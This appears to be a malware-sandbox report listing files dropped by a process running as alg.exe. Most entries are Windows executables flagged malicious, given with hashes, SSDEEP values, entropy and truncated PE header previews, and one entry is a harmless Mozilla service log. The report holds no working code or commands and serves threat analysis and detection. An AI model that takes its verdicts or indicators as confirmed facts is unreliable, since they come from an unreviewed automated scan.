                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....-.+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                                                                                    Entropy (8bit):6.824614287447817
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:cTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPheDmg27RnN:fI72LvkrDpbxJRoIMxD527BWG
                                                                                                                                                                                                                                    MD5:6C4BAD431F555282390D536C2FE0ACBC
                                                                                                                                                                                                                                    SHA1:B41158A1882B3367EB4F31652FA63FFF333572A5
                                                                                                                                                                                                                                    SHA-256:11AD4A2719E6399C527BA6C947B4F1CF5335173D760B7533F68D01B459CCE2A9
                                                                                                                                                                                                                                    SHA-512:BEEA8531523FB58FFA0615EFB05DDBFD86A88AD973F1EA52D9968853DE497949C84A756593F52A5E9599CB768A3ABD90F78E55566170F8B4938EB0819BB8595E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                                                    Entropy (8bit):7.097241657314622
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:uW9Jml9mmijviMnF+ZxmQWcbLw8VdsqjnhMgeiCl7G0nehbGZpbD:uWnm5iOMkjmQWkVBDmg27RnWGj
                                                                                                                                                                                                                                    MD5:DD18393AA8321A85E79682AB520AB0CA
                                                                                                                                                                                                                                    SHA1:A94C97395C97F627EC475CD94873ACE33CEBDEFC
                                                                                                                                                                                                                                    SHA-256:64925905D04F7C77160FDC47D6B3221542151B837F750CF001AEBAF76368659B
                                                                                                                                                                                                                                    SHA-512:004253969E8EEC543C8578927E39090B49C04E8FD8708129FE1E9BD0924ECAC57D8AFC104C1971816E81B2052CB872827D88D92D232D593BE45DB30F574C5830
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .......... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                    Entropy (8bit):7.16637102648637
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:bwNHwoYhua6MtjRO4qbBJTY6mY1uIg7sqjnhMgeiCl7G0nehbGZpbD:bwNPdQO7BJTfmE0Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:54C4F80A7CC1CD350912519A7B9C5AF9
                                                                                                                                                                                                                                    SHA1:DA29537627A1F312F04C249A1B0A7A10BA531FD3
                                                                                                                                                                                                                                    SHA-256:72C8649FA0F7FAFC2E36C7FE2F30979B0BB1601426AB4EE05DFE97ED5076B6B5
                                                                                                                                                                                                                                    SHA-512:BFE3D70063503BA8E683AC9FDF58D71561E5ACFAA225067D83ED39145F6A137D886040274C64B49FD3204F7498B901DB69BFE17915F2214775FCC1FA0BF02F37
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................(..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                    Entropy (8bit):7.145482761713027
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:FiD2VmA1YXwHwlklb8boUuWPg2gWsqjnhMgeiCl7G0nehbGZpbD:UD2VmAyiwIb8boQhDmg27RnWGj
                                                                                                                                                                                                                                    MD5:8BF95769D067840A9B4BF5C7383841E8
                                                                                                                                                                                                                                    SHA1:C4AA0AB7D6422C7DB0DD8BEFAF703C67F34A4842
                                                                                                                                                                                                                                    SHA-256:82484FD8F263A6261E1BFBF66B5B445C6890E8BDE8F34947E7778EF26AF10385
                                                                                                                                                                                                                                    SHA-512:A57ECEA58079F490CDBC18DFC6F64CCB4D94FCE5FEC5D734423C9D6D2B1F54867CA405ADE108B571A69C0E0E377637810834114F6443E3DCB543AD0B64B63E8C
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......c.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                    Entropy (8bit):7.166364282563814
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:CwNHwoYhua6MtjRO4qbBJTY6mY1uIg7sqjnhMgeiCl7G0nehbGZpbD:CwNPdQO7BJTfmE0Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:0AF5A578887D5597461512CC7D7E7D57
                                                                                                                                                                                                                                    SHA1:3370185F2A75F4D3960FACCBB89A9105740DD0D4
                                                                                                                                                                                                                                    SHA-256:EB1FEF9888587544F2AAE22D2DAEEE70D6B06C913A921FD0C760372D8D9698EC
                                                                                                                                                                                                                                    SHA-512:1E83D76C4F378F135B5B0C206B5D4F93835FA04DEF2228E92AF55F5E3FCE342F5F44CF018BF9BDCB7463F69930A81DA27A5747A3C9C4A0C48B53D4B2DFFACB5E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................3..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                                                                                    Entropy (8bit):5.141847499093049
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:m4lbht6BHMsqjnhMgeiCl7G0nehbGZpbD:HlNtqH4Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:48770F4E9955FC239FD97F058FBCD0AD
                                                                                                                                                                                                                                    SHA1:82A8911C2E67BA5A29BB232C04B6D2DB39B70244
                                                                                                                                                                                                                                    SHA-256:5ECD116F8D5AB71718B61E9426B0C3E7C482FAECB7E9B99832C3DD9A82701A76
                                                                                                                                                                                                                                    SHA-512:926559B0E43556BEB16B4F85BA7020F56406F973BA593678FDEA50E88F82F23134656864B0229E9256B5F7FB3F6C3597F00FC0CC75E4CA8E376B74BE073C01C4
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................oU......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                    Entropy (8bit):5.138864176989538
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:LIkOkTB+wIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:LIxkTBVIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:48594EEBEF3F4D8C539C61E8A0BAE296
                                                                                                                                                                                                                                    SHA1:A8C52D62374EEF18A2CA3199459DC936E67A30D8
                                                                                                                                                                                                                                    SHA-256:837742C46F3785EB0698ACE96BC020AFBE6F4265B24D6176A357DD8D1DCCAD66
                                                                                                                                                                                                                                    SHA-512:461B7B21DE4C92F91CE914FC6C95E2EEE74A38E62922D70FC3052A67DDDD8BFAE075D2DEF0892594E2EEE1B12DC1B330309F505A7FD54CD2E5926AF7ED781891
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                                                    Entropy (8bit):5.236778416145552
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:P4lssmroCDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PcssmrhsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:30DA100A840597403D1B027AF1F52CD0
                                                                                                                                                                                                                                    SHA1:08E2F63F9FDB1195C9D597180EDFBFFC9E2D9746
                                                                                                                                                                                                                                    SHA-256:D6F54B88F33209053DEBE12FB0652286C095BE3003BF860DACAD980DA977391C
                                                                                                                                                                                                                                    SHA-512:413B830692775A0CDCAECDECD9F976234E84F05A5DA5C0DA7E5C14649AA4546A2789DA763EE1F6027A5F08C5E8C4D9807C184B6210145ABF87166CB1ED2AE135
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................M.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                                                                                    Entropy (8bit):5.338533444693467
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:403cT++foSBWU2YxhkgqsqjnhMgeiCl7G0nehbGZpbD:/3cK+foQWU2YnP+Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:198E5879330EA5779C00949B72E45DAF
                                                                                                                                                                                                                                    SHA1:8D9FC77C2B25BEE6744D7629382C2EDBD796755B
                                                                                                                                                                                                                                    SHA-256:8AB3AF7EDDD447AA80309E576828F484724C9260758818EF6193804BFF928238
                                                                                                                                                                                                                                    SHA-512:FB0C48FE6EC4DAEB90F79ACC1D0101D91017A451ACD0C831FC4745EF42836EB9F4C27D7C615D58A7BD62DBA9F7ECA57BB7E4E4D58CBC8F5275826EF70747C320
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                    Entropy (8bit):5.138910603478574
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:7brNRzB+NKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:7bBRzBgKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:8ADD569EB5749D2AB161F487E23451EB
                                                                                                                                                                                                                                    SHA1:56FF9D63D94D18853F4E769CB68484DF99CEE129
                                                                                                                                                                                                                                    SHA-256:A4052392FBABBC4B6B89520FF4A814AE8FF844D5D1209BC0063C4F099BFF9555
                                                                                                                                                                                                                                    SHA-512:50FDEB56A2B0499A1B3F8EAFB5C2385E58FAACD219F49D779730186FB43A5907E111AEA41E3D52708F2BDAFCBA8C57B9DB3A6B0CCFDC6E3BA84D854C39217368
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@..................................K..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                                                                                    Entropy (8bit):7.940558542370681
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:Ny53w24gQu3TPZ2psFkiSqwozMDmg27RnWGj:NyFQgZqsFki+ozMD527BWG
                                                                                                                                                                                                                                    MD5:FB7002D439735B0969E87CF03DB3E9A7
                                                                                                                                                                                                                                    SHA1:8ECE116F85B291A6C88561294A187086ED42C860
                                                                                                                                                                                                                                    SHA-256:A0DEA452B9DCF968F0F6BD2CF64B23D93242D0BCDFC1F0144DE73FBD2FE3B54A
                                                                                                                                                                                                                                    SHA-512:BE48E72429317D6725875200A6F5D8A7CFB7EA2D1AB769301B931E6BBCA527087C1D9C6A2B8EB4ED49EC6AC2AE8A45F091642089E00641345E8016147FEBA852
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....&."......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3141
                                                                                                                                                                                                                                    Entropy (8bit):4.84663130450546
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:0KtqLHtgTURd5ek9+lmwCtWlOkWmXmAitWtu7Xbgo:FdU
                                                                                                                                                                                                                                    MD5:8F7418E8C4528476616919C3D70AB3C4
                                                                                                                                                                                                                                    SHA1:096BDD13C3B694DE78B898006C14DBB476BBDC1C
                                                                                                                                                                                                                                    SHA-256:917290B93FA21FCC2355B5B9715682DDB7D6FE3D8E55D4DA0E4ED2D93D58592E
                                                                                                                                                                                                                                    SHA-512:A95FA6BD5C79521F287BD0E223EBC705473FD001B48AC65A501F8795D0879E4F838E2035883CEB88E645F0E6FC75635CB0B301078CD9555EFB04DA0F36A2E286
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-31 03:05:15-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-31 03:05:15-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-31 03:05:1
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                    Entropy (8bit):5.347825314283742
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:0QVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:LVTZu0Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:AF4EAE172A1ED3A96A4B508B5229B3B2
                                                                                                                                                                                                                                    SHA1:6451D84887E2F7EB272841ECD2DC80DA66CE5E9E
                                                                                                                                                                                                                                    SHA-256:77F2D4A8F211E994CE95448E09AC265964328338118F3F2A22A0F4CDBFB6C94F
                                                                                                                                                                                                                                    SHA-512:3F4C139FF587D8A95B725866ED12972F219D7C1CD2D57E52760FDB2B8ED217BA42D11C26E1AAF52D1A6825B29B5281C6B3E966C2BF4B6607985008F6D1B7CD7A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......i.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                    Entropy (8bit):5.623125806435066
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:F+gkESfh4CoysqjnhMgeiCl7G0nehbGZpbD:sgkE+SYDmg27RnWGj
                                                                                                                                                                                                                                    MD5:F2A9FF054D6DAFB100D77970003DB81B
                                                                                                                                                                                                                                    SHA1:7485FBCFD16384EBBBF953C5C814FD8663D51E22
                                                                                                                                                                                                                                    SHA-256:A5FA21B4F969553DE83AF2BE62FF231AC81265D1ADB7BFB680A2F1DAE52D0D47
                                                                                                                                                                                                                                    SHA-512:EA4EF43C913816D57E5F4F09C20F3E23686DE14430E307440A010B31200A616EB0ECEBDB6B3C2CE0FDD59580C0C77737C3ED93D467A00AA81C93C0E406F67DC4
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                                                                                    Entropy (8bit):7.096655046998541
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:vBpDRmi78gkPXlyo0Gtjr1sqjnhMgeiCl7G0nehbGZpbD:5NRmi78gkPX4o0GtjVDmg27RnWGj
                                                                                                                                                                                                                                    MD5:639A908E07A3728AD2FA477C3DF48614
                                                                                                                                                                                                                                    SHA1:B7B7F3756C0F3FE413B0FAB549F9297EAC026E53
                                                                                                                                                                                                                                    SHA-256:8F76BB0CF5A409DA1B985C91131CF1335B00EA47356583F003604B13C1DC06DC
                                                                                                                                                                                                                                    SHA-512:0CCC6C0E28CD12E3DB2F7C171D75E5EA6E1FE75E0AEC4F1E90EE529146710236353C8E635563282371DF06D1A0806ECF4E888A087DD9E632FBB4A418CE5C20B9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                    Entropy (8bit):7.229056226367696
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:XLOS2oTPIXVysqjnhMgeiCl7G0nehbGZpbD:B/TtDmg27RnWGj
                                                                                                                                                                                                                                    MD5:9C48E294ED6D833F6679515D91808F9D
                                                                                                                                                                                                                                    SHA1:ACAE19812098C2120A1E4D010B3269EA53E20F27
                                                                                                                                                                                                                                    SHA-256:58C9472CA6AEE1275F185C6046F58CD6F513D920DE535AE246CE510D6BCDD904
                                                                                                                                                                                                                                    SHA-512:0CA337D44E1AE4FD18A3E63E5E1BE87812F4DE9F6D8421BC84178753268E9161A9E61848FA2D46C85D1995349AAB23481D49E3AEED7A69F551E1455C4F6E42EF
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................o.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                                                                                    Entropy (8bit):5.031191272765625
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:f1MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:f1MsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:81E7A5A0364EEDE5E07DE648CDAAE788
                                                                                                                                                                                                                                    SHA1:C6B520260FEAD62D82130BFAF619AB2ECE1E5C24
                                                                                                                                                                                                                                    SHA-256:38254F572FE836B790069B92FFB7E0D945AA3D89C700FA74FD690EF82E0EC134
                                                                                                                                                                                                                                    SHA-512:C43C0CE6F7761DF8BCCF62E6D54357C054699A29B58BF59D980F5A3F3BA296DBBCBD5BB2FB02AADDF7D022A08D890959439E5562E3BD4BA3AB9E9F98FD260747
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
